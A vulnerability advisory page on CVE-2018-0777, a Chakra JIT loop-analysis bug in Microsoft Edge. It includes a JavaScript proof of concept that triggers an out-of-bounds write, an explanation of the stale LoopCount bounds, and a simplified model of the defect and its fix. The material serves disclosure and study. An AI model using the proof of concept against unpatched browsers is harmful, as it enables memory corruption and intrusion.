SSV:97098
Jan 22, 2018

# Microsoft Edge: Chakra: JIT: Loop analysis bug (CVE-2018-0777)

Root
www.seebug.org

EPSS: 0.951 (percentile 99.3%)

Hereâs the PoC demonstrating OOB write.

```javascript
function opt(arr, start, end) {
    for (let i = start; i < end; i++) {
        if (i === 10) {
            i += 0;  // <<-- (a)
        }
        arr[i] = 2.3023e-320;
    }
}

function main() {
    let arr = new Array(100);
    arr.fill(1.1);

    for (let i = 0; i < 1000; i++)
        opt(arr, 0, 3);

    opt(arr, 0, 100000);
}

main();
```

What happens here is as follows:
In the loop prepass analysis, (a) is a valid add operation. It is a relative operation on 'i', so Chakra considers the loop valid for its analysis. The variable 'i' becomes an induction variable, and a LoopCount object is created. When the LoopCount object is created, the ValueInfo of 'i' is IntBounded, which carries relative bounds information.
In the actual optimization phase, (a) gets optimized into a load operation that directly loads 10 into 'i'. It is no longer a relative operation, so the ValueInfo of 'i' is not IntBounded. But the LoopCount object has already been created with the previous information. This leads Chakra to fail to compute the bounds correctly, which may result in an OOB read/write.
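The following is an added, deliberately simplified model of the mismatch described above; it is not Chakra source and none of its names (`classifyValue`, `createLoopCount`, `foldGuardedAdd`, the toy IR shape) exist in the engine. It shows the general defect class: an analysis object (here a LoopCount) captures the induction variable's ValueInfo at prepass time, a later IR rewrite turns the relative `i += 0` into a constant load, and a consumer that trusts the cached object without checking that the IR is unchanged reasons from stale information. The "fixed" variant simply ties the cached result to an IR version and reclassifies when it no longer matches.

```javascript
// Constructed toy IR for the body of opt(): each instruction that writes a
// variable names it in `dst`. An 'add' whose `src` is the same variable is a
// relative (induction-style) update; a 'load' is an absolute write.
function makeLoopBody() {
  return [
    { op: 'add', dst: 'i', src: 'i', imm: 0 },   // i += 0   -- (a), only reached when i === 10
    { op: 'store', base: 'arr', index: 'i' },    // arr[i] = ...
    { op: 'add', dst: 'i', src: 'i', imm: 1 },   // i++
  ];
}

// Prepass classification (model, not Chakra's real test): `v` is 'IntBounded'
// when every write to it in the loop body is a relative update of itself.
function classifyValue(body, v) {
  const writes = body.filter(ins => ins.dst === v);
  const allRelative = writes.every(ins => ins.op === 'add' && ins.src === v);
  return allRelative ? 'IntBounded' : 'Int';
}

// The LoopCount snapshot: captures the ValueInfo as of creation time and
// remembers which IR version it was computed from.
function createLoopCount(loop, v) {
  return {
    inductionVar: v,
    valueInfo: classifyValue(loop.body, v),
    irVersion: loop.version,
  };
}

// Optimization step modeled on the page: `i += 0` on a path where i is known
// to be `knownValue` is folded into a constant load `i = knownValue`.
// Any rewrite bumps the IR version.
function foldGuardedAdd(loop, v, knownValue) {
  loop.body = loop.body.map(ins =>
    ins.op === 'add' && ins.dst === v && ins.src === v && ins.imm === 0
      ? { op: 'load', dst: v, imm: knownValue }
      : ins);
  loop.version += 1;
}

// Buggy consumer: trusts the cached snapshot regardless of later rewrites,
// so it still believes `i` is IntBounded and uses the precomputed bounds.
function usesCachedBoundsBuggy(loop, loopCount) {
  return loopCount.valueInfo === 'IntBounded';
}

// Fixed consumer: the snapshot is only valid for the IR version it was built
// from; otherwise reclassify from the current IR before relying on bounds.
function usesCachedBoundsFixed(loop, loopCount) {
  const info = loopCount.irVersion === loop.version
    ? loopCount.valueInfo
    : classifyValue(loop.body, loopCount.inductionVar);
  return info === 'IntBounded';
}

// Drives the model end to end and returns what each stage concluded.
function runModel() {
  const loop = { body: makeLoopBody(), version: 0 };
  const loopCount = createLoopCount(loop, 'i');   // prepass: 'IntBounded'
  foldGuardedAdd(loop, 'i', 10);                  // (a) becomes `i = 10`
  return {
    prepassInfo: loopCount.valueInfo,             // 'IntBounded'
    currentInfo: classifyValue(loop.body, 'i'),   // 'Int' after the rewrite
    buggyTrustsBounds: usesCachedBoundsBuggy(loop, loopCount),  // true (stale)
    fixedTrustsBounds: usesCachedBoundsFixed(loop, loopCount),  // false
  };
}

console.log(runModel());
```

The point to carry away is the invariant rather than the toy IR: anything derived from a value's classification before an optimization pass must be invalidated or recomputed once that pass rewrites the instructions the classification was based on.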

